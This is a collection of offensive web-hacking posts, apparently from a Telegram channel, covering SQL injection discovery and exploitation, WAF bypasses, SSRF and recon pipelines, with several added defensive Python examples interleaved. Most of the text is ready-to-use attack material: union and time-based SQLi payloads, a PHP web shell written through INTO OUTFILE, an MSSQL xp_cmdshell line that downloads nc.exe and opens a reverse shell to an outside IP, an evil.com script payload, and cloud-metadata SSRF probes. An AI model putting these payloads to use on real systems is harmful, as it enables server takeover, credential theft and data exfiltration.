Methods for finding SQLi vulnerabilities:
Command Line Tools Like a Pro
1. sublist3r -d target | tee -a domains.txt
2. cat domains.txt | httpx | tee -a alive.txt
3. cat alive.txt | waybackurls | tee -a urls.txt
4. gf sqli urls.txt >> sqli.txt
5. sqlmap -m sqli.txt --dbs --batch --level 3 --risk 2 --time-sec 10 --random-agent
#sqli #sql
Union based:
Look, when you make a request to a URL that interacts with SQL, there are three modes:
1- It returns an answer to you
(For example, when buying from a bookstore, it tells you how many copies of this book are available)
2- It returns a result derived from the answer
(For example, in the same example above, instead of telling you the number, it just tells you whether this book is available or not)
3- No result comes back to you
(For example, you sent a GET or POST request and now the website asks you to allow it to save your IP, cookie, user agent, etc., otherwise you will not be allowed to work with the site.)
How do we know if we have a union?
If the URL is:
https://site.com?news=22
One of the following queries is sent to the database, depending on how the parameter is quoted:
select * from news where news_id = $newsid;
select * from news where news_id = '$newsid';
select * from news where news_id = "$newsid";
Now, to determine if there is Union or not, we have:
With order by, you can find out how many columns the query returns.
Default request:
page/?id=54
Test 1:
page/?id=54 order by 1
page/?id=54' order by 1 #
page/?id=54" order by 1 #
Test 2:
page/?id=54 order by 1000
page/?id=54' order by 1000#
page/?id=54" order by 1000#
In the above, if:
Default == Test 1
and also
Test 1 != Test 2
then we understand that we have Union (:
Now how to extract the information?
The first step is to get the number of columns
And we can find as follows:
page/?id=54 order by 1 #   (same as the default request)
page/?id=54 order by 2 #   (same as the default request)
page/?id=54 order by 3 #   (same as the default request)
page/?id=54 order by 4 #   (not the same as the default request)
So we understand that we have 3 columns
Now with:
page/?id=54 union select 1,2,3 #
We can find the column that returns to us and run our own payloads in it to get data:
For example, to get the database name:
(if it returns the third column)
page/?id=54 union select 1,2,database()#
To get the tables of a database:
page/?id=54 UNION SELECT table_name FROM information_schema.tables WHERE table_schema = 'your_database_name' --
To get the columns of a database and a table:
UNION SELECT column_name FROM information_schema.columns WHERE table_name = 'your_table_name' AND table_schema = 'your_database_name' --
And to get data, we have a column:
UNION SELECT your_column_name FROM your_table_name LIMIT 1 OFFSET 0 --
#SQLI
Disclosed vulnerabilities with bug bounty
1. Account takeover via Self-XSS
An example of how additional functionality can be used to squeeze a one-click account takeover out of a useless Self-XSS. See the report for more details.
2. SQL injection in POST request
Identification and exploitation of a Union-based SQL injection in a POST request based on server responses. More information about exploiting such vulnerabilities here.
3. OTP Bypass
Bypassing OTP confirmation by manipulating the server response. I told you about such bugs here.
#web #xss #sqli
ExploitQuest
About bypassing protection against SQL injections
Often, the WAF on a site stifles all attempts at SQL injection: it will not even let you insert a quotation mark, let alone the usual payload. With some clever manipulation, however, it is still often possible to bypass it.
For example, by adding control characters like %00, %0A, etc., or by inserting mathematical operations
( 'AND'1'=1*1 instead of 'AND'1'='1' )
or by adding specific comments like
/*!50000%55nIoN*/ /*!50000%53eLeCt*/
and much more.
For more examples, you can check out this repository, which shows bypass options for different situations, and I highly recommend this site.
https://websec.ca/kb/sql_injection
https://github.com/kleiton0x00/Advanced-SQL-Injection-Cheatsheet/
#web #sqli #bypass #waf
Transition from SQL injection to shell or backdoor
• Use the "into outfile" command to write to a file:
' union select 1, '<?php system($_GET["cmd"]); ?>' into outfile '/var/www/dvwa/cmd.php' #
• Capture the request in Burp Proxy and save it to the post-request file, then run sqlmap:
sqlmap -r post-request -p item --level=5 --risk=3 --dbms=mysql --os-shell --threads 10
• Reverse netcat shell via MSSQL injection when xp_cmdshell is available:
1000';+exec+master.dbo.xp_cmdshell+'(echo+open+10.11.0.245%26echo+anonymous%26echo+whatever%26echo+binary%26echo+get+nc.exe%26echo+bye)+>+c:\ftp.txt+%26+ftp+-s:c:\ftp.txt+%26+nc.exe+10.11.0.245+443+-e+cmd';--
#web #sqli
After exploiting sql injection using the following email address
"'-sleep(5)-'"@mail.local
you can't help but wonder: why the hell did this even get through as a valid email?
In general, the local part of an email (the login, before the @) can contain special characters according to the RFC, as long as it is enclosed in double quotes. And then our beloved programming languages deviate a little from the RFC in which characters they accept.
So, the next magic:
php -r "echo filter_var('\"\'--><script/src=//evil.com></script>\"@example.com', FILTER_VALIDATE_EMAIL);"
It will validate and legally return an email with the attack vector:
"'--><script/src=//evil.com></script>"@example.com
And how the developers display it further is a separate question.
#sqli
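As an added illustration (not code from the original post), the Python below approximates the RFC 5322 rule that makes these quoted-local-part addresses syntactically valid, then contrasts splicing the validated value into SQL with binding it as a parameter. It uses an in-memory SQLite database; SQLite has no sleep() function, so the spliced version errors out where MySQL would pause for 5 seconds, which is the point: validation proves syntax, not safety.

```python
import re
import sqlite3

# Simplified RFC 5322 addr-spec, written for this example (an approximation of
# the grammar behind PHP's FILTER_VALIDATE_EMAIL, not PHP's own code): the local
# part is a dot-atom OR a quoted-string, and inside the quotes nearly any
# printable character is legal: quotes, dashes, parentheses, angle brackets.
ATEXT = r"[A-Za-z0-9!#$%&'*+/=?^_`{|}~-]+"
DOT_ATOM = rf"{ATEXT}(?:\.{ATEXT})*"
QUOTED_STRING = r'"(?:[^"\\\r\n]|\\.)*"'
LABEL = r"[A-Za-z0-9](?:[A-Za-z0-9-]*[A-Za-z0-9])?"
DOMAIN = rf"{LABEL}(?:\.{LABEL})+"
ADDR_SPEC = re.compile(rf"^(?:{DOT_ATOM}|{QUOTED_STRING})@{DOMAIN}$")

# The two addresses from the post above.
SLEEP_EMAIL = "\"'-sleep(5)-'\"@mail.local"
XSS_EMAIL = "\"'--><script/src=//evil.com></script>\"@example.com"


def is_valid_email(addr):
    """Syntactic validity only: says nothing about whether addr is safe to
    splice into SQL or HTML."""
    return ADDR_SPEC.fullmatch(addr) is not None


def _fresh_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, email TEXT NOT NULL)")
    return conn


def store_email_unsafe(addr):
    """Validate, then build the INSERT by string formatting (the anti-pattern).
    Returns the stored value, or the database error raised when the 'email'
    is parsed as SQL instead of being stored as data."""
    if not is_valid_email(addr):
        return "REJECTED"
    conn = _fresh_db()
    try:
        conn.execute(f"INSERT INTO users (email) VALUES ('{addr}')")
    except sqlite3.Error as exc:
        return f"ERROR: {exc}"
    return conn.execute("SELECT email FROM users").fetchone()[0]


def store_email_safe(addr):
    """Same validation, but the value travels as a bound parameter, so the
    quote characters inside it can never terminate the SQL literal."""
    if not is_valid_email(addr):
        return "REJECTED"
    conn = _fresh_db()
    conn.execute("INSERT INTO users (email) VALUES (?)", (addr,))
    return conn.execute("SELECT email FROM users").fetchone()[0]


if __name__ == "__main__":
    for addr in (SLEEP_EMAIL, XSS_EMAIL):
        print("valid: ", is_valid_email(addr))
        print("unsafe:", store_email_unsafe(addr))
        print("safe:  ", store_email_safe(addr))
```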
Find SQL injection on the site with one command
As always, a set of commands is used for these purposes.
Findomain collects the domains of the site being tested.
Httpx checks their availability.
Waybackurls retrieves all URLs that the Wayback Machine knows about for the identified live subdomains.
Anew will merge Findomain and Waybackurls output and remove duplicates.
Now we'll use gf to filter out URLs that match patterns with potential SQL injection (don't forget to install gf-patterns as well).
Finally, let's run sqlmap on all identified potentially vulnerable URLs.
findomain -t testphp.vulnweb.com -q | httpx -silent | anew | waybackurls | gf sqli >> sqli ; sqlmap -m sqli --batch --random-agent
#web #sqli
Finding SQL Injection Vulnerabilities in Multiple Ways with Examples + Achieving RCE via SQLi
SQL Injection (SQLi) is one of the most critical web vulnerabilities, allowing an attacker to manipulate database queries, extract sensitive data, modify records, or even execute system commands (RCE - Remote Code Execution).
This article will explore multiple ways to detect SQLi vulnerabilities with practical examples and then demonstrate how SQLi can lead to RCE.
━━━━━━━━━━━━━━━━━━
1. Discovering SQL Injection Vulnerabilities in Multiple Ways
Method 1: Manual Testing with Special Characters
The simplest way to test for SQL Injection is by inserting special characters such as:
'
"
--
#
;
Example 1: Injecting a Single Quote
'
If a website has a login page like:
https://example.com/login.php?user=admin
Try entering:
https://example.com/login.php?user=admin'
If an error appears like:
You have an error in your SQL syntax...
It indicates an SQL Injection vulnerability.
━━━━━━━━━━━━━━━━━━
Method 2: Injecting Simple SQL Queries
If the backend SQL query looks like this:
SELECT * FROM users WHERE username = '$user' AND password = '$pass'
You can try the following payloads:
admin' --
or
' OR '1'='1' --
If you gain access without entering a password, the application is vulnerable.
━━━━━━━━━━━━━━━━━━
Method 3: Using SQLMap for Automated Testing
SQLMap is a powerful tool for automated SQL Injection detection. Run:
sqlmap -u "https://example.com/login.php?user=admin" --dbs
SQLMap will analyze the URL and extract the database names if vulnerable.
━━━━━━━━━━━━━━━━━━
Method 4: Testing with SQL Sleep (Time-Based SQLi)
If error messages are hidden, you can test for Time-Based SQLi:
https://example.com/page?id=1' AND SLEEP(5) --
If the page takes 5 seconds to load, the database is likely vulnerable.
━━━━━━━━━━━━━━━━━━
Method 5: Data Extraction via UNION-Based SQL Injection
If a website displays data from a database, try injecting a UNION SELECT query:
https://example.com/page?id=1 UNION SELECT 1,2,3,4 --
If numbers or unexpected data appear, the website is vulnerable.
━━━━━━━━━━━━━━━━━━
2. Escalating SQL Injection to RCE (Remote Code Execution)
If SQL Injection allows file operations via LOAD_FILE() or OUTFILE, you can execute commands on the server.
Example: Uploading a Web Shell via SQLi
SELECT "<?php system($_GET['cmd']); ?>" INTO OUTFILE '/var/www/html/shell.php';
Now, access the shell through:
http://target.com/shell.php?cmd=whoami
If SQL Server has xp_cmdshell enabled, execute system commands like:
EXEC xp_cmdshell 'whoami';
This will return the current system user running the database service.
━━━━━━━━━━━━━━━━━━
3. Exploiting SQL Injection to Gain Admin Access
In some cases, SQLi can be used to escalate privileges by modifying session data:
UPDATE users SET is_admin = 1 WHERE username = 'victim';
Or steal an admin session:
SELECT session_id FROM users WHERE username = 'admin';
Conclusion
• Test manually using ' and OR 1=1
• Use SQLMap for automatic SQLi detection
• Escalate SQLi to RCE if the system allows file operations
• Test SQL Sleep (Time-Based Injection) for hidden errors
• Use UNION SELECT to extract sensitive data
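As an added defensive counterpart (not code from the original posts), the Python below runs the detection logic a defender would write for the payload families walked through above (quote-plus-comment probes, ORDER BY column counting, UNION SELECT, tautologies, SLEEP(), and the versioned-comment obfuscation from the WAF-bypass post) over constructed access-log lines. The log lines and client IPs are constructed samples in documentation ranges.

```python
import re
from urllib.parse import unquote_plus

# Combined-log-format request line: we only need client IP, URI and status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<uri>\S+) [^"]*" (?P<status>\d{3}) \S+'
)

# One pattern per payload family shown on this page.
SQLI_PATTERNS = {
    "quote_comment": re.compile(r"""['"]\s*(?:--|#|/\*)"""),
    "boolean_tautology": re.compile(
        r"""\bor\b\s*['"]?\s*\d+\s*['"]?\s*=\s*['"]?\s*\d+""", re.I),
    "order_by_probe": re.compile(r"\border\s+by\s+\d+", re.I),
    "union_select": re.compile(r"\bunion\s+(?:all\s+)?select\b", re.I),
    "schema_enum": re.compile(r"\binformation_schema\s*\.\s*(?:tables|columns)\b", re.I),
    "time_based": re.compile(r"\b(?:sleep|benchmark|pg_sleep)\s*\(", re.I),
}


def normalize(raw):
    """Undo the encodings the WAF-bypass tricks above rely on before matching."""
    text = raw
    for _ in range(2):                       # double URL-encoding is common
        text = unquote_plus(text)
    text = re.sub(r"/\*!\d*", " ", text)     # versioned comment openers /*!50000
    text = text.replace("*/", " ")           # ... and their closers
    text = re.sub(r"/\*.*?\*/", " ", text)   # plain inline comments used as spaces
    text = text.replace("\x00", " ")         # %00 separators
    return re.sub(r"\s+", " ", text)


def classify(uri):
    """Names of the payload families present in one request URI."""
    text = normalize(uri)
    return [name for name, rx in SQLI_PATTERNS.items() if rx.search(text)]


def scan_access_log(lines):
    """Return one finding per log line that carries a SQLi indicator."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        hits = classify(m["uri"])
        if hits:
            findings.append({"ip": m["ip"], "uri": m["uri"],
                             "status": int(m["status"]), "indicators": hits})
    return findings


# Constructed sample log lines replaying the payloads from the posts above,
# plus two benign requests that must not be flagged.
SAMPLE_LOG = [
    '203.0.113.5 - - [10/Oct/2023:13:55:36 +0000] "GET /page/?id=54 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '203.0.113.5 - - [10/Oct/2023:13:55:41 +0000] "GET /page/?id=54%27%20order%20by%201000%23 HTTP/1.1" 500 312 "-" "Mozilla/5.0"',
    '203.0.113.5 - - [10/Oct/2023:13:55:52 +0000] "GET /page/?id=54%20union%20select%201,2,database()%23 HTTP/1.1" 200 5211 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [10/Oct/2023:14:01:03 +0000] "GET /login.php?user=admin%27%20OR%20%271%27%3D%271%27%20-- HTTP/1.1" 302 0 "-" "curl/8.0"',
    '198.51.100.7 - - [10/Oct/2023:14:01:09 +0000] "GET /page.php?id=1%27%20AND%20SLEEP(5)%20-- HTTP/1.1" 200 5120 "-" "curl/8.0"',
    '198.51.100.7 - - [10/Oct/2023:14:01:15 +0000] "GET /index.php?id=1%20/*!50000%55nIoN*/%20/*!50000%53eLeCt*/%201,2,3 HTTP/1.1" 200 5300 "-" "curl/8.0"',
    '192.0.2.9 - - [10/Oct/2023:14:05:00 +0000] "GET /search?q=order+by+date HTTP/1.1" 200 2048 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for f in scan_access_log(SAMPLE_LOG):
        print(f["ip"], f["status"], ",".join(f["indicators"]), f["uri"])
```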
━━━━━━━━━━━━━━━━━━
Join now
[https://t.me/ExploitQuest]
#SQLi #XSS #RCE #LFI #WebSecurity #Exploit #CVE #Malware #ReverseEngineering
ExploitQuest
contact: @ExploitQuestbot
CORS one liner command exploiter
This is an extremely helpful and practical cheatsheet for bug hunters, which helps you find CORS misconfigurations in every possible way. Simply replace https://example.com with the URL you want to target. This lets you scan for CORS vulnerabilities without the need for an external tool. All you have to do is copy and paste the commands into your terminal and keep your fingers crossed for any possible CORS.
Github
#SQLi #XSS #RCE #LFI #WebSecurity #Exploit #CVE
GitHub - kleiton0x00/CORS-one-liner: A one liner Bash command which finds CORS in every possible endpoint.
Changing HTTP Request Methods and Their Security Impact
When we send a GET request to a website like site.com, we usually receive an HTML page or another expected response.
But what happens if we change the request method to POST, PUT, or DELETE?
This can lead to different reactions from the server, such as:
1- Rejecting the request and returning 405 Method Not Allowed.
2- Processing the request in an unexpected way, potentially causing errors or data leaks.
3- In rare cases, this can lead to severe security vulnerabilities, such as Remote Code Execution (RCE).
━━━━━━━━━━━━━━━━━━
Impact on Web Frameworks (e.g., Laravel)
Some web frameworks, like Laravel, return sensitive information when an error occurs, especially if debug mode is enabled. Changing the request method unexpectedly may trigger errors that expose:
• Database credentials.
• Environment variables.
• File paths and internal configurations.
In some cases, improper handling of user input can even lead to RCE vulnerabilities, allowing an attacker to execute commands on the server.
━━━━━━━━━━━━━━━━━━
Practical Examples
Example 1: 405 Error When Changing Method
Trying to send a POST request to an endpoint that only allows GET:
curl -X POST http://example.com/
The server might respond with:
HTTP/1.1 405 Method Not Allowed
Example 2: Internal Error Due to Unexpected Request
If a server encounters an error when
processing an unexpected request method, it might return:
HTTP/1.1 500 Internal Server Error
In Laravel, if APP_DEBUG=true, it might expose sensitive details like:
SQLSTATE[HY000] [1045] Access denied for user 'root'@'localhost'
This could reveal database credentials or configuration files.
Example 3: RCE Exploitation in Laravel
If an application uses eval() or system() with unsanitized user input, an attacker may be able to execute system commands by altering the request:
curl -X DELETE http://example.com/delete_user --data "id=1; system('whoami');"
If the server is not properly filtering input, it may execute the whoami command and return the server's user name.
#SQLi #XSS #RCE #LFI #WebSecurity #Exploit #CVE
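As an added defensive illustration (not code from the original post), the Python below shows the server-side behaviour the post contrasts: a per-route method allow-list that answers 405 with an Allow header, a strict id check on the DELETE route instead of handing raw input to eval()/system(), and a 500 boundary that logs the database error quoted above but never returns it to the client unless a debug flag (standing in for APP_DEBUG) is on. The routes and handlers are hypothetical.

```python
import logging
from urllib.parse import unquote_plus

log = logging.getLogger("app")

# The kind of detail a debug page leaks (quoted from the post above); here it
# is only ever written to the server log.
DB_ERROR = "SQLSTATE[HY000] [1045] Access denied for user 'root'@'localhost'"


def parse_body(body):
    """Form-encoded body -> dict of first values. Split on '&' only, so a ';'
    inside a value stays part of that value; nothing here is evaluated."""
    params = {}
    for pair in body.split("&"):
        if not pair:
            continue
        key, _, value = pair.partition("=")
        params.setdefault(unquote_plus(key), unquote_plus(value))
    return params


def home(params):
    return 200, "<html>home</html>"


def delete_user(params):
    # Strict allow-list on the one field we expect: "1; system('whoami');" is
    # not a digit string and is rejected before any query or command runs.
    raw = params.get("id", "")
    if not raw.isdigit():
        return 400, "invalid id"
    return 200, f"user {int(raw)} deleted"


def report(params):
    # Hypothetical handler whose database connection is misconfigured.
    raise RuntimeError(DB_ERROR)


# Route table: path -> (allowed methods, handler). Anything else is rejected
# before handler code runs.
ROUTES = {
    "/": ({"GET", "HEAD"}, home),
    "/delete_user": ({"DELETE"}, delete_user),
    "/report": ({"GET"}, report),
}


def dispatch(method, path, body="", debug=False):
    """Return (status, headers, body). `debug` plays the role of APP_DEBUG:
    error detail reaches the client only when it is on; the default is off."""
    route = ROUTES.get(path)
    if route is None:
        return 404, {}, "Not Found"
    allowed, handler = route
    if method.upper() not in allowed:
        # 405 is the correct, boring answer: name the methods, leak nothing else.
        return 405, {"Allow": ", ".join(sorted(allowed))}, "Method Not Allowed"
    try:
        status, text = handler(parse_body(body))
        return status, {}, text
    except Exception as exc:  # last-resort boundary around handler code
        log.exception("unhandled error on %s %s", method, path)  # detail stays server-side
        detail = f": {exc}" if debug else ""
        return 500, {}, "Internal Server Error" + detail


if __name__ == "__main__":
    logging.basicConfig(level=logging.CRITICAL)  # keep the demo output clean
    for req in (("POST", "/"),
                ("DELETE", "/delete_user", "id=1; system('whoami');"),
                ("GET", "/report"),
                ("GET", "/report", "", True)):
        print(req[:2], "->", dispatch(*req))
```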
A Simple Yet Effective Way to Find SQLI Vulnerabilities
Sometimes, simple methods work best when hunting for SQL injection (SQLI) vulnerabilities. Here's an optimized approach:
1. Extract Potential Targets
Use Wayback Machine URLs to find historical URLs with parameters:
waybackurls --dates target.com | grep '?id='
This helps identify pages that may still be vulnerable.
━━━━━━━━━━━━━━━━━━
2. Test for SQLI Sleep-Based Vulnerabilities
Use the following payload:
if(now()=sysdate(),SLEEP(8),0)
If the response is delayed by ~8 seconds, the parameter is likely injectable.
━━━━━━━━━━━━━━━━━━
3. Manual Testing with cURL
curl -X GET "https://target.com/page.php?id=1" --data-urlencode "id=1' OR if(now()=sysdate(),SLEEP(8),0) -- -" -H "X-Forwarded-For: 127.0.0.1"
• The X-Forwarded-For header may help bypass basic IP-based WAF restrictions.
• Modify headers like User-Agent to mimic real traffic.
━━━━━━━━━━━━━━━━━━
4. Automated Testing with Ghauri (Bypassing WAFs)
ghauri -u "https://target.com/page.php?id=1" --timeout=30 --delay=5 --technique=BEST --level=3 --prefix="/**/" --suffix="-- -" --safe-chars="[]" --random-agent --ignore-code=403
--timeout=30: Sets the request timeout to 30 seconds.
--delay=5: Adds a 5-second delay between requests to avoid detection.
--technique=BEST: Uses the most effective SQL injection techniques.
--level=3: Performs more advanced tests for better detection.
--prefix="/**/": Adds a comment prefix to bypass WAF filters.
--suffix="-- -": Ends the payload with a SQL comment to evade detection.
--safe-chars="[]": Prevents certain characters from being URL-encoded.
--random-agent: Uses a random User-Agent to avoid fingerprinting.
--ignore-code=403: Ignores 403 Forbidden responses to continue scanning.
━━━━━━━━━━━━━━━━━━
5. Advanced Testing with SQLMap
sqlmap -u "https://target.com/page.php?id=1" --batch --random-agent --tamper="between,space2comment,charencode" --timeout=15 --time-sec=8 --level=5 --risk=3
--random-agent: Uses random user-agents to avoid detection.
--tamper: Applies obfuscation techniques to evade WAFs.
--risk=3 --level=5: Enables deep scanning with advanced payloads.
━━━━━━━━━━━━━━━━━━
Conclusion
✓ Wayback Machine helps find old endpoints.
✓ Manual payloads help confirm basic SQL injection.
✓ Ghauri & SQLMap provide automation with WAF bypass techniques.
━━━━━━━━━━━━━━━━━━
[https://t.me/ExploitQuest]
#BugBounty #SQLi #SQLInjection #PenTesting #CyberSecurity #EthicalHacking #InfoSec #RedTeam #WebSecurity #Hacking #BugHunter #WAFBypas
These commands and URLs are used for gathering and analyzing data about a specific domain (example.com in this case).
The goal is to identify exposed files, sensitive information, and security-related data. Here's a breakdown:
1. Using Archive.org to Find Archived URLs
URL:
https://web.archive.org/cdx/search/cdx?url=*.example.com/*&collapse=urlkey&output=text&fl=original
Explanation:
• This query retrieves all archived URLs of example.com from the Wayback Machine.
• *.example.com/* searches all subdomains and pages.
• collapse=urlkey removes duplicate URLs.
• output=text formats the output as plain text.
• fl=original extracts only the original URLs without extra metadata.
━━━━━━━━━━━━━━━━━━
2. Using VirusTotal to Get a Domain Report
URL:
https://www.virustotal.com/vtapi/v2/domain/report?apikey=YOUR_API_KEY&domain=example.com
Explanation:
• Retrieves a security report for example.com from VirusTotal.
• This report includes:
  - Blacklist status
  - Malicious activities detected
  - Known associated malicious URLs
• Replace YOUR_API_KEY with a valid VirusTotal API key.
━━━━━━━━━━━━━━━━━━
3. Using AlienVault OTX to Fetch URLs Related to a Domain
URL:
https://otx.alienvault.com/api/v1/indicators/hostname/domain.com/url_list?limit=500&page=1
Explanation:
• Queries AlienVault OTX for URLs associated with domain.com.
• limit=500 retrieves up to 500 URLs per page.
• page=1 fetches the first page of results.
━━━━━━━━━━━━━━━━━━
4. Using curl to Fetch Archived URLs and Save Them to a File
Command:
curl -G "https://web.archive.org/cdx/search/cdx" \
--data-urlencode "url=*.example.com/*" \
--data-urlencode "collapse=urlkey" \
--data-urlencode "output=text" \
--data-urlencode "fl=original" > out.txt
Explanation:
• Fetches all archived URLs of example.com from the Wayback Machine.
• Saves the output to out.txt for further processing.
━━━━━━━━━━━━━━━━━━
5. Extracting Sensitive Files Using uro and grep
Command:
cat out.txt | uro | grep -E '\.xls|\.xml|\.xlsx|\.json|\.pdf|\.sql|\.doc|\.docx|\.pptx|\.txt|\.zip|\.tar\.gz|\.tgz|\.bak|\.7z|\.rar|\.log|\.cache|\.secret|\.db|\.backup|\.yml|\.gz|\.config|\.csv|\.yaml|\.md|\.md5|\.exe|\.dll|\.bin|\.ini|\.bat|\.sh|\.tar|\.deb|\.rpm|\.iso|\.img|\.apk|\.msi|\.dmg|\.tmp|\.crt|\.pem|\.key|\.pub|\.asc'
Explanation:
1- cat out.txt → Reads the archived URLs from out.txt.
2- uro → Deduplicates and normalizes URLs.
3- grep -E → Uses regular expressions (regex) to extract potentially sensitive files, such as:
  • Database files: .sql, .db, .backup
  • Documents: .xls, .xlsx, .doc, .pdf, .txt
  • Compressed archives: .zip, .tar.gz, .rar, .7z
  • Encryption keys: .pem, .crt, .key, .asc
  • Configuration files: .config, .ini, .yaml, .yml
  • Executable files: .exe, .dll, .apk, .msi
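As an added example (not part of the original post), the Python below does the filtering step of this pipeline as a parser rather than a line grep: it reads fl=original CDX output (one URL per line), deduplicates, and buckets URLs into the categories listed above by the extension of the URL path only, so a match inside a host name or a double extension such as news.txt.html does not count. The CDX lines are a constructed sample, and the extension sets are the representative ones the post names.

```python
import posixpath
from urllib.parse import urlsplit

# Representative extensions per category, as grouped in the explanation above.
SENSITIVE_EXTENSIONS = {
    "database": {".sql", ".db", ".backup", ".bak"},
    "document": {".xls", ".xlsx", ".doc", ".docx", ".pd", ".pdf", ".txt", ".csv"},
    "archive": {".zip", ".tar.gz", ".tgz", ".rar", ".7z", ".tar", ".gz"},
    "key": {".pem", ".crt", ".key", ".asc", ".pub"},
    "config": {".config", ".ini", ".yaml", ".yml"},
    "executable": {".exe", ".dll", ".apk", ".msi", ".bin"},
}

# Constructed sample of `fl=original` CDX output (one archived URL per line),
# including a duplicate, a query string, and a misleading double extension.
SAMPLE_CDX = """\
http://example.com/
http://example.com/backup/site-2019.sql
http://example.com/backup/site-2019.sql
http://static.example.com/assets/app.js
http://example.com/docs/invoice-0042.pdf
http://example.com/files/export.tar.gz
http://example.com/config/web.config
http://example.com/certs/server.key
http://example.com/news.txt.html
http://example.com/setup.exe?v=2
""".splitlines()


def classify_url(url):
    """Return (category, extension) judged on the last segment of the URL path,
    or None. Two-part extensions (.tar.gz) are tried before single ones."""
    name = posixpath.basename(urlsplit(url).path.lower())
    parts = name.split(".")
    candidates = []
    if len(parts) >= 3:
        candidates.append("." + ".".join(parts[-2:]))
    if len(parts) >= 2:
        candidates.append("." + parts[-1])
    for ext in candidates:
        for category, exts in SENSITIVE_EXTENSIONS.items():
            if ext in exts:
                return category, ext
    return None


def triage(cdx_lines):
    """Deduplicate CDX URLs and bucket the sensitive-looking ones by category."""
    report = {}
    seen = set()
    for line in cdx_lines:
        url = line.strip()
        if not url or url in seen:
            continue
        seen.add(url)
        hit = classify_url(url)
        if hit is not None:
            report.setdefault(hit[0], []).append(url)
    return report


if __name__ == "__main__":
    for category, urls in triage(SAMPLE_CDX).items():
        print(category)
        for u in urls:
            print("   ", u)
```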
━━━━━━━━━━━━━━━━━━
Summary:
These commands help in discovering and analyzing sensitive files that might be publicly accessible by:
1-Fetching archived URLs from Wayback Machine.
2-Checking for malicious activity on VirusTotal and AlienVault.
3-Filtering sensitive files using grep and uro.
[https://t.me/ExploitQuest]
#BugBounty #SQLi #SQLInjection #PenTesting #CyberSecurity #EthicalHacking #InfoSec #RedTeam #WebSecurity #Hacking #BugHunter #WAFBypas
Server-Side Request Forgery (SSRF) is a powerful vulnerability that occurs when a server fetches external resources based on user input. If exploited, it can lead to data leakage, access to internal systems, or even full infrastructure compromise.
Here's a step-by-step guide to discovering and exploiting SSRF vulnerabilities:
━━━━━━━━━━━━━━━━━━
Start by locating areas where the application sends outbound requests. Common sources include:
If HTML or external content is processed, injecting a malicious URL can trick the server into making a request to your controlled endpoint.
Example:
<img src="http://attacker.com/payload"/>
━━━━━━━━━━━━━━━━━━
Test the server's behavior by sending malformed URLs and observe the error responses:
These clues indicate whether the server is trying to make external requests.
Test Payloads:
http://invalid-url
http://example.local
http://127.0.0.1:9999
━━━━━━━━━━━━━━━━━━
Once confirmed, aim for internal IP ranges such as:
These often expose admin panels, internal APIs, or development services. Port scanning via SSRF is also possible by analyzing different response behaviors.
Example:
http://127.0.0.1:8000/admin
━━━━━━━━━━━━━━━━━━
In cloud environments (AWS, Azure, GCP), internal metadata endpoints may leak sensitive info like access keys and tokens.
Payloads:
http://169.254.169.254/latest/meta-data
http://169.254.169.254/metadata/instance?api-version=2021-02-01
Be sure to include necessary headers if required (e.g., Metadata: true for Azure).
━━━━━━━━━━━━━━━━━━
If filters are in place, use bypass techniques:
http://127%2E0%2E0%2E1
http://2130706433 (equals 127.0.0.1)
http://[::]
Pro Tip: Use DNS rebinding or SSRF chaining with redirect-capable endpoints.
━━━━━━━━━━━━━━━━━━
In blind SSRF cases, you won't get visible feedback. Use external monitoring tools to detect interactions:
Example:
http://your-collaborator-url.com
Monitor for DNS or HTTP logs to confirm server-side interaction.
━━━━━━━━━━━━━━━━━━
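As an added defensive example (not code from the original post), the Python below is the destination check a server-side fetcher should run before following a user-supplied URL: it normalizes the spellings listed above (percent-encoded dots, a decimal IP, [::]) and refuses loopback, link-local (which covers 169.254.169.254), private, unspecified and multicast addresses, resolving host names through an injectable resolver so the check runs offline here. The stub resolver table is constructed.

```python
import ipaddress
import socket
from urllib.parse import unquote, urlsplit

ALLOWED_SCHEMES = {"http", "https"}


def literal_ip(host):
    """Parse the host as an IP literal in any of the spellings above (dotted
    quad, percent-encoded dots, bare decimal integer, IPv6); None if it is a
    DNS name."""
    host = unquote(host)
    try:
        return ipaddress.ip_address(int(host) if host.isdigit() else host)
    except ValueError:
        return None


def system_resolver(host):
    return [info[4][0] for info in socket.getaddrinfo(host, None)]


def is_allowed_destination(url, resolver=system_resolver):
    """True only if the URL uses http(s) and every address it can reach is
    globally routable. `resolver` is injectable so the check runs offline in
    tests. In production, also connect to the resolved address rather than the
    name, so a second DNS answer cannot swap in an internal host (the
    rebinding trick the post mentions)."""
    try:
        parts = urlsplit(url)
    except ValueError:
        return False
    if parts.scheme.lower() not in ALLOWED_SCHEMES or not parts.hostname:
        return False
    addr = literal_ip(parts.hostname)
    if addr is not None:
        targets = [addr]
    else:
        try:
            targets = [ipaddress.ip_address(a) for a in resolver(parts.hostname)]
        except (socket.gaierror, ValueError):
            return False
    # is_global excludes loopback, RFC 1918, link-local (169.254.0.0/16),
    # unspecified (0.0.0.0, ::) and reserved ranges; multicast is excluded separately.
    return bool(targets) and all(a.is_global and not a.is_multicast for a in targets)


# Constructed resolver table standing in for DNS so the example runs offline.
STUB_DNS = {
    "cdn.example": ["93.184.216.34"],    # a public address
    "intranet.example": ["10.0.0.5"],    # resolves into RFC 1918 space
}


def stub_resolver(host):
    return STUB_DNS.get(host, [])


if __name__ == "__main__":
    for u in ("https://cdn.example/logo.png", "http://169.254.169.254/latest/meta-data",
              "http://127%2E0%2E0%2E1", "http://2130706433", "http://[::]",
              "http://intranet.example/", "http://invalid-url", "file:///etc/passwd"):
        print(is_allowed_destination(u, stub_resolver), u)
```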
That's all, friends!
Happy hacking and see you next time!
#BugBounty
#ssrf
#sqli
#bypass
Here's a list of SQLMap preconfigured profiles you can use for stealthy SQL injection, especially when dealing with WAFs, rate limits, or intrusion detection systems (IDS/IPS).
These profiles combine SQLMap's most effective flags for stealth, evasion, and precision targeting. Two cautions apply to all of them: --risk=3 enables OR-based payloads that can modify data when the injection point sits in an UPDATE or DELETE statement, and every tamper script in the chain is applied to every payload, so a long chain slows detection and can break payloads that would otherwise have worked.

1. Stealth Mode (WAF Bypass + Delay)
